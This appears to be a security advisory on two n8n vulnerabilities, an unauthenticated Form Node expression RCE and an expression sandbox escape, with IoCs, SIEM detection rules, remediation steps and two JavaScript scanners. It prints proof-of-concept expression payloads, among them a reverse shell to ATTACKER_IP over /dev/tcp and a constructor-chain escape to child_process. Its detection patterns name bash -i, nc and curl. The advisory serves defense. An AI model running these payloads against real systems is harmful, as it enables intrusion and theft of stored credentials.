Product Name: n8n
Category: Workflow Automation / Integration Platform
Technology Stack: Node.js, TypeScript
Deployment Models: Self-hosted (Docker, npm, Kubernetes), Desktop App, Cloud
Default Port: 5678
Primary Functionality: Visual workflow automation connecting APIs, databases, internal services, SaaS platforms
n8n enables dynamic data processing through JavaScript-based expressions embedded in workflow nodes. These expressions are evaluated inside a sandboxed execution environment. The vulnerabilities below directly affect this expression engine and its sandbox isolation controls.
CVE-2026-27493 – Unauthenticated Expression Evaluation in Form Node
Basic CVE Information
| Field | Details |
|---|---|
| CVE ID | CVE-2026-27493 |
| Vulnerability Type | Remote Code Execution (RCE) |
| Component | Form Node |
| CVSS Score | 9.8 (Critical) |
| Attack Vector | Network |
| Privileges Required | None |
| User Interaction | None |
| Exploitability | High |
| Exploit Availability | Proof of Concept available (educational use) |
| Impact | Full system compromise |
Vulnerability Summary
A critical flaw was identified in the Form Node component. Under certain configurations, user-supplied input submitted through publicly exposed forms was processed as expressions without adequate validation or isolation. The expression engine executed the payload on the server side.
Improper restriction of JavaScript evaluation allowed access to Node.js internals. Arbitrary commands could therefore be executed on the underlying operating system.
No authentication was required when the Form endpoint was exposed publicly, which significantly increased the risk.
Technical Details
The vulnerability stemmed from unsafe expression parsing combined with insufficient sandbox hardening. The evaluation mechanism failed to properly isolate:
- `require`
- `process`
- `child_process`
- Global constructors
- Node.js module resolution paths
Once access to these objects was achieved, system command execution became trivial.
If n8n was deployed inside a Docker container running as root (a common misconfiguration), full container escape or host compromise could follow.
Attack Scenario
- A publicly accessible n8n instance was identified.
- An active Form Node endpoint was discovered.
- Malicious JavaScript expression payload was submitted via form field.
- Payload was evaluated server-side.
- Remote command execution occurred.
- Reverse shell or persistence mechanism was deployed.
Because no authentication was required, automated scanning tools could identify and exploit vulnerable endpoints.
Proof of Concept (Educational)
Example payload to execute system command:
{{$evaluate("require('child_process').execSync('id').toString()")}}
Reverse shell example:
{{$evaluate("require('child_process').exec('bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1')")}}
These payloads demonstrated direct access to the Node.js child_process module from within an expression.
MITRE ATT&CK Mapping
- T1190 – Exploit Public-Facing Application
- T1059.007 – JavaScript Execution
- T1106 – Native API
- T1071 – Application Layer Protocol
- T1021 – Remote Services (if pivoting occurred)
Indicators of Compromise
- Unexpected child processes spawned by n8n
- Execution of `/bin/bash`, `sh`, `nc`, `curl`, or `wget` by the n8n process
- Outbound connections to unknown IP addresses
- Suspicious expressions containing `require(`, `child_process`, `process.mainModule`, `execSync`, or `eval(`
Detection Rules
Splunk Query
index=app_logs sourcetype=n8n
("require(" OR "child_process" OR "execSync" OR "process.mainModule")
Elastic (KQL)
process.name : "node" AND
process.command_line : ("child_process" OR "execSync" OR "bash -i")
Microsoft Sentinel (KQL)
DeviceProcessEvents
| where InitiatingProcessFileName == "node"
| where ProcessCommandLine contains "child_process"
or ProcessCommandLine contains "execSync"
or ProcessCommandLine contains "bash -i"
Linux Auditd Monitoring
-w /usr/bin/node -p x -k node_execution
Alert if node spawns shell processes.
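The process-creation rules above all reduce to one check: a shell or network tool whose parent is the n8n node process, or a child command line carrying the strings the page lists. The following is an added example (not from the advisory and not n8n's own code) that applies that check to constructed EDR-style events; the field names `parent_image`, `image`, `command_line` and `pid` are assumptions that mirror Sysmon / DeviceProcessEvents-style telemetry and should be mapped to your source. Note that the expression payload itself never appears on the node process's command line; the observable is the child process it spawns.

```javascript
// Added example, not from the advisory or n8n: flag shell/network tools spawned by the n8n node
// process and command lines carrying the page's indicators. Event field names are assumed.
const SHELL_OR_TOOL = new Set(["bash", "sh", "dash", "zsh", "nc", "ncat", "curl", "wget"]);
const NODE_PARENTS = new Set(["node", "n8n"]);
// Strings the advisory's detection rules key on, as regexes over the child command line.
const SUSPICIOUS_ARGS = [/bash -i/, /\/dev\/tcp\//, /child_process/, /execSync/];

function basename(path) {
  return path.split("/").pop();
}

// Returns { pid, reasons }; an empty reasons array means the event is benign.
function classifyEvent(evt) {
  const parent = basename(evt.parent_image || "");
  const child = basename(evt.image || "");
  const cmd = evt.command_line || "";
  const reasons = [];
  if (NODE_PARENTS.has(parent) && SHELL_OR_TOOL.has(child)) {
    reasons.push(`node spawned ${child}`);
  }
  for (const re of SUSPICIOUS_ARGS) {
    if (re.test(cmd)) reasons.push(`command line matches ${re}`);
  }
  return { pid: evt.pid, reasons };
}

// Keeps only events with at least one reason, preserving input order.
function scanEvents(events) {
  return events.map(classifyEvent).filter((r) => r.reasons.length > 0);
}

// Constructed sample telemetry (not real logs): a benign n8n start, a benign cron shell,
// a shell spawned by node, and a node-spawned bash carrying the reverse-shell signature.
const SAMPLE_EVENTS = [
  { pid: 101, parent_image: "/usr/local/bin/node", image: "/usr/local/bin/node",
    command_line: "node /usr/local/lib/node_modules/n8n/bin/n8n" },
  { pid: 202, parent_image: "/usr/bin/cron", image: "/bin/sh",
    command_line: "sh -c logrotate" },
  { pid: 303, parent_image: "/usr/local/bin/node", image: "/bin/sh",
    command_line: "sh -c id" },
  { pid: 404, parent_image: "/usr/local/bin/node", image: "/bin/bash",
    command_line: "bash -c 'bash -i >& /dev/tcp/192.0.2.10/4444 0>&1'" },
];

console.log(JSON.stringify(scanEvents(SAMPLE_EVENTS), null, 2));
```

On a healthy n8n host the node process rarely has shell children at all, so the parent/child pair alone is a high-signal alert; the command-line patterns add context for triage rather than being required for the hit.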
Log Sources to Monitor
- n8n execution logs
- Docker container logs
- Reverse proxy logs (NGINX / Apache)
- EDR telemetry
- Linux auditd logs
- Sysmon (Windows deployments)
- Network firewall egress logs
Business Impact
- Complete server takeover
- Credential extraction from environment variables
- Access to stored OAuth tokens
- Workflow manipulation
- Internal network lateral movement
- Data exfiltration
If connected to CRM, ERP, payment processors, or internal APIs, the blast radius could be extensive.
Remediation
- Immediate upgrade to patched release
- Disable public Form Nodes if not required
- Enforce authentication on all endpoints
- Run container as non-root user
- Restrict outbound network access
- Implement Web Application Firewall rules
Official Patch
Upgrade to the latest stable release:
https://github.com/n8n-io/n8n/releases
CVE-2026-27577 – Expression Sandbox Escape
Basic CVE Information
| Field | Details |
|---|---|
| CVE ID | CVE-2026-27577 |
| Vulnerability Type | Sandbox Escape → Remote Code Execution |
| Component | Expression Engine |
| CVSS Score | 9.9 (Critical) |
| Attack Vector | Network |
| Privileges Required | Low / Depends on configuration |
| User Interaction | None |
| Exploitability | Very High |
| Exploit Availability | Proof of Concept available (educational use) |
| Impact | Full Remote Code Execution |
Vulnerability Summary
The expression sandbox mechanism was designed to restrict JavaScript execution within workflows. However, insufficient isolation controls allowed attackers to escape the sandbox using crafted constructor chains.
Global object constructors were not fully restricted. By chaining constructors, access to the process object was achieved. From there, Node.js module loading mechanisms could be abused to execute arbitrary commands.
Technical Details
The flaw involved exposure of:
- The `Function` constructor
- Prototype chain traversal
- Incomplete freezing of global context
- Access to `this.constructor.constructor`
By abusing JavaScript internals, the sandbox boundary was bypassed.
Exploitation Flow
- Expression editing access was obtained.
- Malicious constructor chain was injected.
- Access to the `process` object was retrieved.
- `mainModule.require('child_process')` was invoked.
- Arbitrary command execution occurred.
Even low-privilege users with expression editing rights could escalate privileges.
Proof of Concept (Educational)
{{$evaluate("this.constructor.constructor('return process')().mainModule.require('child_process').execSync('whoami').toString()")}}
MITRE ATT&CK Mapping
- T1068 – Exploitation for Privilege Escalation
- T1059 – Command and Scripting Interpreter
- T1203 – Exploitation for Execution
- T1027 – Obfuscated/Compressed Files
Indicators of Compromise
- Presence of `constructor.constructor`, `Function('return process')`, or `mainModule.require` in expressions
- Node process spawning shell
- Unexpected workflow modifications
- Unauthorized admin-level API calls
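The expression indicators listed for both CVEs (require/child_process/execSync/eval for the Form Node issue, constructor chains and mainModule.require for the sandbox escape) can be checked statically against a workflow export before it is imported or on a schedule against stored workflows. The block below is an added example, not code from the advisory or from n8n: it walks every string in a workflow JSON object, treats strings containing `{{ ... }}` as expressions, and reports which indicators each one matches. The sample workflow is constructed; its node layout only loosely resembles an n8n export, and the regexes generalise the page's literal strings slightly (whitespace, bracket access, either quote style). Plain string matching is evadable by obfuscation (T1027 is mapped above), so treat this as a triage aid alongside the process-level rules, not a substitute.

```javascript
// Added example, not from the advisory or n8n: static scan of workflow expressions for the
// indicators the page lists for CVE-2026-27493 and CVE-2026-27577.
const INDICATORS = [
  { id: "require-call",            re: /\brequire\s*\(/ },
  { id: "child_process",           re: /child_process/ },
  { id: "process.mainModule",      re: /process\s*\.\s*mainModule/ },
  { id: "execSync",                re: /\bexecSync\b/ },
  { id: "eval-call",               re: /\beval\s*\(/ },
  // constructor.constructor or constructor['constructor'] (bracket form is an assumed variant)
  { id: "constructor-chain",       re: /constructor\s*(\.|\[\s*['"])\s*constructor/ },
  { id: "Function-return-process", re: /Function\s*\(\s*['"]return\s+process['"]\s*\)/ },
  { id: "mainModule.require",      re: /mainModule\s*\.\s*require/ },
];

// Only strings that contain an expression block are scanned; plain text is skipped.
const EXPRESSION_RE = /\{\{[\s\S]*?\}\}/;

// Yields every string in a JSON-like value with a JSONPath-style location.
function* walkStrings(value, path = "$") {
  if (typeof value === "string") {
    yield { path, value };
  } else if (Array.isArray(value)) {
    for (let i = 0; i < value.length; i++) yield* walkStrings(value[i], `${path}[${i}]`);
  } else if (value && typeof value === "object") {
    for (const [k, v] of Object.entries(value)) yield* walkStrings(v, `${path}.${k}`);
  }
}

// Returns the ids of all indicators present in one expression string, in INDICATORS order.
function scanExpression(text) {
  return INDICATORS.filter((ind) => ind.re.test(text)).map((ind) => ind.id);
}

// Returns one finding per expression string that matches at least one indicator.
function scanWorkflow(workflow) {
  const findings = [];
  for (const { path, value } of walkStrings(workflow)) {
    if (!EXPRESSION_RE.test(value)) continue;
    const indicators = scanExpression(value);
    if (indicators.length > 0) findings.push({ path, indicators, snippet: value.slice(0, 80) });
  }
  return findings;
}

// Constructed sample export (not a real n8n workflow): two benign values, two hits, one plain note.
const SAMPLE_WORKFLOW = {
  name: "constructed sample",
  nodes: [
    { name: "Form", parameters: { formTitle: "Contact us" } },
    { name: "Set", parameters: { value: "={{ $json.email.toLowerCase() }}" } },
    { name: "Set2", parameters: {
        value: "={{$evaluate(\"require('child_process').execSync('id').toString()\")}}" } },
    { name: "Code", parameters: {
        value: "={{ this.constructor.constructor('return process')().mainModule.require('child_process') }}" } },
    { name: "Note", parameters: { text: "Do not use require() here" } },
  ],
};

console.log(JSON.stringify(scanWorkflow(SAMPLE_WORKFLOW), null, 2));
```

Run it against `n8n export:workflow` output or the workflow table in the database; the `path` field points at the exact parameter to inspect, and the `$evaluate(` wrapper used in the page's payloads is deliberately not an indicator on its own, since `\beval\s*\(` does not match it.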
Detection Rules
Splunk Query
index=app_logs sourcetype=n8n
("constructor.constructor" OR "mainModule.require" OR "Function('return process')")
Elastic (KQL)
process.name : "node" AND
process.command_line : ("constructor.constructor" OR "mainModule.require")
Microsoft Sentinel (KQL)
DeviceProcessEvents
| where InitiatingProcessFileName == "node"
| where ProcessCommandLine contains "constructor.constructor"
or ProcessCommandLine contains "mainModule.require"
Network Monitoring
Alert on outbound connections from n8n container to unknown external IP addresses over uncommon ports.
Log Sources to Monitor
- n8n workflow execution history
- User activity logs
- Authentication logs
- Reverse proxy access logs
- OS-level process creation logs
- Container runtime monitoring
- Firewall egress logs
Business Impact
- Complete automation platform compromise
- Exposure of API credentials and secrets
- SaaS account takeover via stored tokens
- Data theft and manipulation
- Ransomware staging opportunity
- Supply chain compromise risk
Given that n8n often integrates with financial systems, cloud platforms, and internal services, the operational impact could extend beyond the automation platform itself.
Remediation
- Immediate upgrade to patched release
- Restrict expression editing permissions
- Enforce strict RBAC
- Deploy behind reverse proxy with authentication
- Implement network segmentation
- Monitor for anomalous workflow behavior
- Enforce container runtime security policies
Official Patch
Upgrade to the latest stable release:
https://github.com/n8n-io/n8n/releases
